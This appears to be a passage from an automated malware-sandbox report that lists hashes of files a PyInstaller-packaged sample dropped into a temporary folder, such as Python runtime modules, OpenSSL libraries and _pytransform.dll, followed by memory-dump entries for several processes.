7f8d3b79a58612e850d18e8952d14793e974483c688b5daee217baaa83120fd50d1e036ca4a1b59d748b22951744377257d2a8f094a4b4de1f79fecd4bf06afb

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI31522\_lzma.pyd
MD5
a567a2ecb4737e5b70500eac25f23049

SHA1
951673dd1a8b5a7f774d34f61b765da2b4026cab

SHA256
a4cba6d82369c57cb38a32d4dacb99225f58206d2dd9883f6fc0355d6ddaec3d

SHA512
97f3b1c20c9a7ed52d9781d1e47f4606579faeae4d98ba09963b99cd2f13426dc0fc2aeb4bb3af18ed584c8ba9d5b6358d8e34687a1d5f74a3954b3f84d12349

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI31522\_pytransform.dll
MD5
abca9b21dbfababb998cdc44a18b05cf

SHA1
2cc1b9438b7b7c9c5f8a68a4ad6f40b6b78d3c1f

SHA256
489bf9ffca3eb878b6dd187ae52fb421dd99da432a102325bcdd706cb8816005

SHA512
c02342117215beae5caeea8d764db3fd8fe215b1b0ed96963b4591b0c5f0ac47b6c5616996b78b3b22ad6837bb227ecc4b5eead64ad137a86dbf59ec25a22d16

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI31522\_queue.pyd
MD5
2325dab36242fc732c85914ab7ce25af

SHA1
b4a81b312b6e037a0aa4a2e2de5e331cb2803648

SHA256
2ffa512a2a369ccd3713419c6d4e36c2bd5d1967e046663d721d7e7ac9e4ab59

SHA512
13f92c90a81f5dfbc15cadfd31dbc30b5c72c93dc7ad057f4b211388c3a57ab070bd25c0f1212173a0772972b2d3aa2caedbfb7e3513ffc0d83a15dbc9198b87

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI31522\_socket.pyd
MD5
d7e7a7592338ce88e131f858a84deec6

SHA1
3add8cd9fbbf7f5fa40d8a972d9ac18282dcf357

SHA256
4ba5d0e236711bdcb29ce9c3138406f7321bd00587b6b362b4ace94379cf52d5

SHA512
96649296e8ccdc06d6787902185e21020a700436fc7007b2aa6464d0af7f9eb66a4485b3d46461106ac5f1d35403183daa1925e842e7df6f2db9e3e833b18fb4

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI31522\_ssl.pyd
MD5
d429ff3fd91943ad8539c076c2a0c75f

SHA1
bb6611ddca8ebe9e4790f20366b89253a27aed02

SHA256
45c8b99ba9e832cab85e9d45b5601b7a1d744652e7f756ec6a6091e1d8398dd4

SHA512
019178eecb9fb3d531e39854685a53fa3df5a84b1424e4a195f0a51ca0587d1524fd8fbd6d4360188ea9c2f54d7019c7d335ec6dc5471128159153c2287b0e18

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI31522\libcrypto-1_1-x64.dll
MD5
022a61849adab67e3a59bcf4d0f1c40b

SHA1
fca2e1e8c30767c88f7ab5b42fe2bd9abb644672

SHA256
2a57183839c3e9cc4618fb1994c40e47672a8b6daffaa76c5f89cf2542b02c2f

SHA512
94ac596181f0887af7bf02a7ce31327ad443bb7fe2d668217953e0f0c782d19296a80de965008118708afd9bda14fd8c78f49785ebf7abcc37d166b692e88246

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI31522\libssl-1_1-x64.dll
MD5
4ec3c7fe06b18086f83a18ffbb3b9b55

SHA1
31d66ffab754fe002914bff2cf58c7381f8588d9

SHA256
9d35d8dd9854a4d4205ae4eafe28c92f8d0e3ac7c494ac4a6a117f6e4b45170c

SHA512
d53ee1f7c082a27ace38bf414529d25223c46bfae1be0a1fbe0c5eab10a7b10d23571fd9812c3be591c34059a4c0028699b4bf50736582b06a17ae1ef1b5341e

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI31522\pyexpat.pyd
MD5
c07e41d262afd5ea693d38d7217e0ab0

SHA1
bc60d537a91d123e2bfc0954b20773333a83fd61

SHA256
3aea3048fd56f0e4cea65401d36df2185f516aa31fcf92f93c28e569072246bb

SHA512
c25ca6518686634eaa619ebcdc6fc4a992a6074ba1a6dd7f725fb214b7674e47e9f56d6e973a608ee752b44cc7fdb2e6a37d7cfb172d651cf97ac8554d4197c4

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI31522\python37.dll
MD5
62125a78b9be5ac58c3b55413f085028

SHA1
46c643f70dd3b3e82ab4a5d1bc979946039e35b2

SHA256
17c29e6188b022f795092d72a1fb58630a7c723d70ac5bc3990b20cd2eb2a51f

SHA512
e63f4aa8fc5cd1569ae401e283bc8e1445859131eb0db76581b941f1085670c549cbc3fedf911a21c1237b0f3f66f62b10c60e88b923fa058f7fafee18dd0fa4

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI31522\select.pyd
MD5
c30e5eccf9c62b0b0bc57ed591e16cc0

SHA1
24aece32d4f215516ee092ab72471d1e15c3ba24

SHA256
56d1a971762a1a56a73bdf64727e416ffa9395b8af4efcd218f5203d744e1268

SHA512
3e5c58428d4c166a3d6d3e153b46c4a57cca2e402001932ec90052c4689b7f5ba4c5f122d1a66d282b2a0a0c9916dc5a5b5e5f6dfc952cdb62332ac29cb7b36a

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI31522\ucrtbase.dll
MD5
0e0bac3d1dcc1833eae4e3e4cf83c4ef

SHA1
4189f4459c54e69c6d3155a82524bda7549a75a6

SHA256
8a91052ef261b5fbf3223ae9ce789af73dfe1e9b0ba5bdbc4d564870a24f2bae

SHA512
a45946e3971816f66dd7ea3788aacc384a9e95011500b458212dc104741315b85659e0d56a41570731d338bdf182141c093d3ced222c007038583ceb808e26fd

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI31522\unicodedata.pyd
MD5
7d1f105cf81820bb6d0962b669897dde

SHA1
6c4897147c05c6d6da98dd969bf84e12cc5682be

SHA256
71b13fd922190081d3aeec8628bd72858cc69ee553e16bf3da412f535108d0e4

SHA512
7546c3afb0440dc0e4c0f24d7b145a4f162cda72068cc51f7dc1a644454b645c0b3c954920c489b0748ba4c1ea2c34e86ba2565770e08077c2fdd02fd237f9d3

Download Submit
memory/200-117-0x00007FF7ABC10000-0x00007FF7AC4FD000-memory.dmp

Filesize
8.9MB

Download
memory/200-116-0x0000000000000000-mapping.dmp

Download
memory/916-215-0x0000028C4BB33000-0x0000028C4BB35000-memory.dmp

Filesize
8KB

Download
memory/916-192-0x0000000000000000-mapping.dmp

Download
memory/916-233-0x0000028C4BB36000-0x0000028C4BB38000-memory.dmp

Filesize
8KB

Download
memory/916-212-0x0000028C4BB30000-0x0000028C4BB32000-memory.dmp

Filesize
8KB

Download
memory/1316-190-0x0000020E998E6000-0x0000020E998E8000-memory.dmp

Filesize
8KB

Download
memory/1316-179-0x0000020E998E0000-0x0000020E998E2000-memory.dmp

Filesize
8KB

Download
memory/1316-175-0x0000020E998E3000-0x0000020E998E5000-memory.dmp

Filesize
8KB

Download
memory/1316-168-0x0000000000000000-mapping.dmp

Download
memory/2088-193-0x0000000000000000-mapping.dmp

Download
memory/2088-232-0x0000023EED806000-0x0000023EED808000-memory.dmp

Filesize
8KB

Download
memory/2088-210-0x0000023EED800000-0x0000023EED802000-memory.dmp

Filesize
8KB

Download
memory/2088-214-0x0000023EED803000-0x0000023EED805000-memory.dmp

Filesize
8KB

Download
memory/2136-247-0x0000000000000000-mapping.dmp

Download
memory/2136-251-0x00000255DC9A3000-0x00000255DC9A5000-memory.dmp

Filesize
8KB

Download
memory/2136-250-0x00000255DC9A0000-0x00000255DC9A2000-memory.dmp

Filesize
8KB

Download
memory/2136-256-0x00000255DC9A6000-0x00000255DC9A8000-memory.dmp

Filesize
8KB

Download
memory/2156-268-0x0000000000000000-mapping.dmp

Download
memory/2216-267-0x0000000000000000-mapping.dmp

Download
memory/2600-165-0x0000000000000000-mapping.dmp

Download
memory/3152-114-0x0000000000000000-mapping.dmp

Download
memory/3152-115-0x00007FF7ABC10000-0x00007FF7AC4FD000-memory.dmp

Filesize
8.9MB

Download
memory/3492-266-0x0000000000000000-mapping.dmp

Download
memory/3584-249-0x0000000000000000-mapping.dmp

Download
memory/3660-257-0x00000279C3070000-0x00000279C3072000-memory.dmp

Filesize
8KB

Download
memory/3660-258-0x00000279C3073000-0x00000279C3075000-memory.dmp

Filesize
8KB

Download
memory/3660-259-0x00000279C3076000-0x00000279C3078000-memory.dmp

Filesize
8KB

Download
memory/3660-253-0x0000000000000000-mapping.dmp

Download
memory/3724-177-0x000001EFEBAB3000-0x000001EFEBAB5000-memory.dmp

Filesize
8KB

Download
memory/3724-265-0x00000228E88F6000-0x00000228E88F8000-memory.dmp

Filesize
8KB

Download
memory/3724-153-0x0000000000000000-mapping.dmp

Download
memory/3724-159-0x000001EFEBA10000-0x000001EFEBA11000-memory.dmp

Filesize
4KB

Download
memory/3724-164-0x000001EFEDD10000-0x000001EFEDD11000-memory.dmp

Filesize
4KB

Download
memory/3724-260-0x0000000000000000-mapping.dmp

Download
memory/3724-173-0x000001EFEBAB0000-0x000001EFEBAB2000-memory.dmp

Filesize
8KB

Download
memory/3724-178-0x000001EFEBAB6000-0x000001EFEBAB8000-memory.dmp

Filesize
8KB

Download
memory/3724-264-0x00000228E88F3000-0x00000228E88F5000-memory.dmp

Filesize
8KB

Download
memory/3724-263-0x00000228E88F0000-0x00000228E88F2000-memory.dmp

Filesize
8KB

Download
memory/3944-187-0x0000000000000000-mapping.dmp

Download
memory/4056-246-0x000001D4F7068000-0x000001D4F7069000-memory.dmp

Filesize
4KB

Download
memory/4056-234-0x0000000000000000-mapping.dmp

Download
memory/4056-243-0x000001D4F7060000-0x000001D4F7062000-memory.dmp

Filesize
8KB

Download
memory/4056-244-0x000001D4F7063000-0x000001D4F7065000-memory.dmp

Filesize
8KB

Download
memory/4056-245-0x000001D4F7066000-0x000001D4F7068000-memory.dmp

Filesize
8KB

Download